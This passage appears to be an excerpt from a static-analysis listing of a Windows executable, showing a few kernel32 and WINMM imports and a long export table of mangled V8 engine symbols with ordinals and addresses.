GetThreadContext, InitializeSRWLock, InitializeCriticalSectionEx, InitOnceBeginInitialize, InitOnceComplete, EncodePointer, DecodePointer, LCMapStringEx, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree
                                  WINMM.dlltimeGetTime
                                  NameOrdinalAddress
                                  ??$Add@VIsolate@internal@v8@@@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z10x140761d30
                                  ??$Add@VIsolate@internal@v8@@@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z20x140761ee0
                                  ??$Add@VIsolate@internal@v8@@@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z30x140762140
                                  ??$Add@VIsolate@internal@v8@@@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z40x140762420
                                  ??$Add@VOffThreadIsolate@internal@v8@@@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z50x1407626d0
                                  ??$Add@VOffThreadIsolate@internal@v8@@@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z60x140762880
                                  ??$Add@VOffThreadIsolate@internal@v8@@@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z70x140762ae0
                                  ??$Add@VOffThreadIsolate@internal@v8@@@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z80x140762d50
                                  ??$Allocate@VIsolate@internal@v8@@@AstConsString@internal@v8@@AEBA?AV?$Handle@VString@internal@v8@@@12@PEAVIsolate@12@@Z90x140a5e910
                                  ??$Allocate@VIsolate@internal@v8@@@DescriptorArray@internal@v8@@SA?AV?$Handle@VDescriptorArray@internal@v8@@@12@PEAVIsolate@12@HHW4AllocationType@12@@Z100x1407631d0
                                  ??$Allocate@VOffThreadIsolate@internal@v8@@@AstConsString@internal@v8@@AEBA?AV?$Handle@VString@internal@v8@@@12@PEAVOffThreadIsolate@12@@Z110x140a5e9c0
                                  ??$AllocateFlat@VIsolate@internal@v8@@@AstConsString@internal@v8@@QEBA?AV?$Handle@VString@internal@v8@@@12@PEAVIsolate@12@@Z120x140a5ea70
                                  ??$AllocateFlat@VOffThreadIsolate@internal@v8@@@AstConsString@internal@v8@@QEBA?AV?$Handle@VString@internal@v8@@@12@PEAVOffThreadIsolate@12@@Z130x140a5ec50
                                  ??$AllocatePage@$00VSemiSpace@internal@v8@@@MemoryAllocator@internal@v8@@QEAAPEAVPage@12@_KPEAVSemiSpace@12@W4Executability@12@@Z140x1408cdd80
                                  ??$AllocatePage@$0A@VPagedSpace@internal@v8@@@MemoryAllocator@internal@v8@@QEAAPEAVPage@12@_KPEAVPagedSpace@12@W4Executability@12@@Z150x1408cddf0
                                  ??$AllocatePage@$0A@VSemiSpace@internal@v8@@@MemoryAllocator@internal@v8@@QEAAPEAVPage@12@_KPEAVSemiSpace@12@W4Executability@12@@Z160x1408cde30
                                  ??$AllocateScopeInfos@VIsolate@internal@v8@@@DeclarationScope@internal@v8@@SAXPEAVParseInfo@12@PEAVIsolate@12@@Z170x140a50b60
                                  ??$AllocateScopeInfos@VOffThreadIsolate@internal@v8@@@DeclarationScope@internal@v8@@SAXPEAVParseInfo@12@PEAVOffThreadIsolate@12@@Z180x140a50c10
                                  ??$AllocateScopeInfosRecursively@VIsolate@internal@v8@@@Scope@internal@v8@@AEAAXPEAVIsolate@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z190x140a50cc0
                                  ??$AllocateScopeInfosRecursively@VOffThreadIsolate@internal@v8@@@Scope@internal@v8@@AEAAXPEAVOffThreadIsolate@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z200x140a50d50
                                  ??$AllocateSlotSet@$00@MemoryChunk@internal@v8@@QEAAPEAVSlotSet@12@XZ210x1408cdfb0
                                  ??$AllocateSlotSet@$0A@@MemoryChunk@internal@v8@@QEAAPEAVSlotSet@12@XZ220x1408cdfc0
                                  ??$At@VIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEBA?AV?$MaybeHandle@VObject@internal@v8@@@23@_KPEAVIsolate@23@@Z230x14086cf50
                                  ??$At@VOffThreadIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEBA?AV?$MaybeHandle@VObject@internal@v8@@@23@_KPEAVOffThreadIsolate@23@@Z240x14086d010
                                  ??$BigIntLiteral@VIsolate@internal@v8@@@internal@v8@@YA?AV?$MaybeHandle@VBigInt@internal@v8@@@01@PEAVIsolate@01@PEBD@Z250x140843110
                                  ??$BigIntLiteral@VOffThreadIsolate@internal@v8@@@internal@v8@@YA?AV?$MaybeHandle@VBigInt@internal@v8@@@01@PEAVOffThreadIsolate@01@PEBD@Z260x140843210
                                  ??$BuildValue@VIsolate@internal@v8@@@Literal@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@12@PEAVIsolate@12@@Z270x140a5c180
                                  ??$BuildValue@VOffThreadIsolate@internal@v8@@@Literal@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@12@PEAVOffThreadIsolate@12@@Z280x140a5c3c0
                                  ??$Create@VIsolate@internal@v8@@@ScopeInfo@internal@v8@@SA?AV?$Handle@VScopeInfo@internal@v8@@@12@PEAVIsolate@12@PEAVZone@12@PEAVScope@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z290x140755820
                                  ??$Create@VOffThreadIsolate@internal@v8@@@ScopeInfo@internal@v8@@SA?AV?$Handle@VScopeInfo@internal@v8@@@12@PEAVOffThreadIsolate@12@PEAVZone@12@PEAVScope@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z300x1407564e0
                                  ??$CreateScript@VIsolate@internal@v8@@@ParseInfo@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VString@internal@v8@@@12@V?$MaybeHandle@VFixedArray@internal@v8@@@12@VScriptOriginOptions@2@W4NativesFlag@12@@Z310x140739400
                                  ??$CreateScript@VOffThreadIsolate@internal@v8@@@ParseInfo@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@12@PEAVOffThreadIsolate@12@V?$Handle@VString@internal@v8@@@12@V?$MaybeHandle@VFixedArray@internal@v8@@@12@VScriptOriginOptions@2@W4NativesFlag@12@@Z320x1407395a0
                                  ??$Decode@E@Utf8Decoder@internal@v8@@QEAAXPEAEAEBV?$Vector@$$CBE@12@@Z330x1405fb520
                                  ??$Decode@G@Utf8Decoder@internal@v8@@QEAAXPEAGAEBV?$Vector@$$CBE@12@@Z340x1405fb660
                                  ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z350x140764450
                                  ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z360x140764590
                                  ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z370x1407646d0
                                  ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z380x140764800
                                  ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z390x140764940
                                  ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z400x140764a80
                                  ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z410x140764bb0
                                  ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z420x140764cf0
                                  ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z430x140764e30
                                  ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@SA?AV?$Handle@VStringTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z440x140764f60
                                  ??$EnsureCapacity@VOffThreadIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@HW4AllocationType@12@@Z450x140765090
                                  ??$EnsureCapacity@VOffThreadIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@HW4AllocationType@12@@Z460x1407651c0
                                  ??$EnsureCapacity@VOffThreadIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@HW4AllocationType@12@@Z470x140765300
                                  ??$EnsureCapacity@VOffThreadIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@HW4AllocationType@12@@Z480x140765430
                                  ??$EnsureCapacity@VOffThreadIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@HW4AllocationType@12@@Z490x140765570
                                  ??$EnsureCapacity@VOffThreadIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@HW4AllocationType@12@@Z500x1407656b0
                                  ??$EnsureCapacity@VOffThreadIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@HW4AllocationType@12@@Z510x1407657e0
                                  ??$EnsureCapacity@VOffThreadIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@HW4AllocationType@12@@Z520x140765920
                                  ??$EnsureCapacity@VOffThreadIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@HW4AllocationType@12@@Z530x140765a60
                                  ??$EnsureCapacity@VOffThreadIsolate@internal@v8@@@?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@SA?AV?$Handle@VStringTable@internal@v8@@@12@PEAVOffThreadIsolate@12@V312@HW4AllocationType@12@@Z540x140765b90
                                  ??$Free@$00@MemoryAllocator@internal@v8@@QEAAXPEAVMemoryChunk@12@@Z550x1408ce0b0
                                  ??$Free@$01@MemoryAllocator@internal@v8@@QEAAXPEAVMemoryChunk@12@@Z560x1408ce0e0
                                  ??$Free@$02@MemoryAllocator@internal@v8@@QEAAXPEAVMemoryChunk@12@@Z570x1408ce150
                                  ??$Free@$0A@@MemoryAllocator@internal@v8@@QEAAXPEAVMemoryChunk@12@@Z580x1408ce1d0
                                  ??$GetBoilerplateValue@VIsolate@internal@v8@@@MaterializedLiteral@internal@v8@@IEAA?AV?$Handle@VObject@internal@v8@@@12@PEAVExpression@12@PEAVIsolate@12@@Z590x140a5c660
                                  ??$GetBoilerplateValue@VOffThreadIsolate@internal@v8@@@MaterializedLiteral@internal@v8@@IEAA?AV?$Handle@VObject@internal@v8@@@12@PEAVExpression@12@PEAVOffThreadIsolate@12@@Z600x140a5c700
                                  ??$InitFromFunctionLiteral@VIsolate@internal@v8@@@SharedFunctionInfo@internal@v8@@SAXPEAVIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@PEAVFunctionLiteral@12@_N@Z610x140765f40
                                  ??$InitFromFunctionLiteral@VOffThreadIsolate@internal@v8@@@SharedFunctionInfo@internal@v8@@SAXPEAVOffThreadIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@PEAVFunctionLiteral@12@_N@Z620x1407663d0
                                  ??$InitLineEnds@VIsolate@internal@v8@@@Script@internal@v8@@SAXPEAVIsolate@12@V?$Handle@VScript@internal@v8@@@12@@Z630x140766820
                                  ??$InitLineEnds@VOffThreadIsolate@internal@v8@@@Script@internal@v8@@SAXPEAVOffThreadIsolate@12@V?$Handle@VScript@internal@v8@@@12@@Z640x140766930
                                  ??$Internalize@VIsolate@internal@v8@@@AstValueFactory@internal@v8@@QEAAXPEAVIsolate@12@@Z650x140a5ee60
                                  ??$Internalize@VOffThreadIsolate@internal@v8@@@AstValueFactory@internal@v8@@QEAAXPEAVOffThreadIsolate@12@@Z660x140a5ef90
                                  ??$InternalizeStringWithKey@V?$SequentialStringKey@E@internal@v8@@@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SequentialStringKey@E@12@@Z670x1409439f0
                                  ??$InternalizeStringWithKey@V?$SequentialStringKey@G@internal@v8@@@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SequentialStringKey@G@12@@Z680x1409439f0
                                  ??$MakeCheckOpString@HH@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@HHPEBD@Z690x140dbd000
                                  ??$MakeCheckOpString@II@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IIPEBD@Z700x140dbd2d0
                                  ??$MakeCheckOpString@JJ@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@JJPEBD@Z710x140dbd5a0
                                  ??$MakeCheckOpString@KK@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@KKPEBD@Z720x140dbd870
                                  ??$MakeCheckOpString@PEBXPEBX@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBX0PEBD@Z730x140dbdb40
                                  ??$MakeCheckOpString@_J_J@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_J0PEBD@Z740x140dbde10
                                  ??$MakeCheckOpString@_K_K@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_K0PEBD@Z750x140dbe0e0
                                  ??$New@VIsolate@internal@v8@@@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z760x140767080
                                  ??$New@VIsolate@internal@v8@@@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z770x1407670d0
                                  ??$New@VIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z780x140767120
                                  ??$New@VIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z790x1407671e0
                                  ??$New@VIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z800x1407672a0
                                  ??$New@VIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z810x140767360
                                  ??$New@VIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z820x140767420
                                  ??$New@VIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z830x1407674e0
                                  ??$New@VIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z840x1407675a0
                                  ??$New@VIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z850x140767660
                                  ??$New@VIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z860x1407674e0
                                  ??$New@VIsolate@internal@v8@@@?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@SA?AV?$Handle@VStringTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z870x140767720
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z880x1407677e0
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z890x140767830
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z900x140767880
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z910x140767940
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z920x140767a00
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z930x140767ac0
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z940x140767b80
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z950x140767c40
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z960x140767d00
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z970x140767dc0
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z980x140767c40
                                  ??$New@VOffThreadIsolate@internal@v8@@@?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@SA?AV?$Handle@VStringTable@internal@v8@@@12@PEAVOffThreadIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z990x140767e80
                                  ??$NewHeapNumber@$00@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1000x140955010
                                  ??$NewHeapNumber@$00@?$FactoryBase@VOffThreadFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1010x1409550b0
                                  ??$NewHeapNumber@$03@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1020x140955140
                                  ??$NewHeapNumber@$0A@@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VHeapNumber@internal@v8@@@12@XZ1030x1409551e0
                                  ??$PrintCheckOperand@C@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@C@Z1040x140dbe3b0
                                  ??$PrintCheckOperand@D@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@D@Z1050x140dbe3b0
                                  ??$PrintCheckOperand@E@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@E@Z1060x140dbe3d0
                                  ??$PrintCheckOperand@H@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@H@Z1070x140dbe3f0
                                  ??$PrintCheckOperand@I@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@I@Z1080x140dbe540
                                  ??$PrintCheckOperand@J@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@J@Z1090x140dbe690
                                  ??$PrintCheckOperand@K@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@K@Z1100x140dbe940
                                  ??$PrintCheckOperand@PEAC@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAC@Z1110x140dbebf0
                                  ??$PrintCheckOperand@PEAD@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAD@Z1120x140dbebf0
                                  ??$PrintCheckOperand@PEAE@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAE@Z1130x140dbebf0
                                  ??$PrintCheckOperand@PEBC@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBC@Z1140x140dbebf0
                                  ??$PrintCheckOperand@PEBD@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBD@Z1150x140dbebf0
                                  ??$PrintCheckOperand@PEBE@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBE@Z1160x140dbebf0
                                  ??$PrintCheckOperand@PEBX@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBX@Z1170x140dbec10
                                  ??$PrintCheckOperand@_J@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_J@Z1180x140dbed60
                                  ??$PrintCheckOperand@_K@base@v8@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_K@Z1190x140dbf010
                                  ??$RegisterObjectWithInvalidatedSlots@$00@MemoryChunk@internal@v8@@QEAAXVHeapObject@12@@Z1200x1408ce7b0
                                  ??$RegisterObjectWithInvalidatedSlots@$0A@@MemoryChunk@internal@v8@@QEAAXVHeapObject@12@@Z1210x1408ce850
                                  ??$SignedDivisionByConstant@I@base@v8@@YA?AU?$MagicNumbersForDivision@I@01@I@Z1220x141046f20
                                  ??$SignedDivisionByConstant@_K@base@v8@@YA?AU?$MagicNumbersForDivision@_K@01@_K@Z1230x141047020
                                  ??$Start@$00@LookupIterator@internal@v8@@AEAAXXZ1240x14079bee0
                                  ??$Start@$0A@@LookupIterator@internal@v8@@AEAAXXZ1250x14079bf50
                                  ??$TailCallBytecodeDispatch@V?$TNode@VObject@internal@v8@@@internal@v8@@V?$TNode@UIntPtrT@internal@v8@@@23@V?$TNode@VBytecodeArray@internal@v8@@@23@V?$TNode@VExternalReference@internal@v8@@@23@@CodeAssembler@compiler@internal@v8@@QEAAXAEBVCallInterfaceDescriptor@23@V?$TNode@URawPtrT@internal@v8@@@23@V?$TNode@VObject@internal@v8@@@23@V?$TNode@UIntPtrT@internal@v8@@@23@V?$TNode@VBytecodeArray@internal@v8@@@23@V?$TNode@VExternalReference@internal@v8@@@23@@Z1260x140e686b0
                                  ??$ToBytecodeArray@VIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVIsolate@23@@Z1270x14088eea0
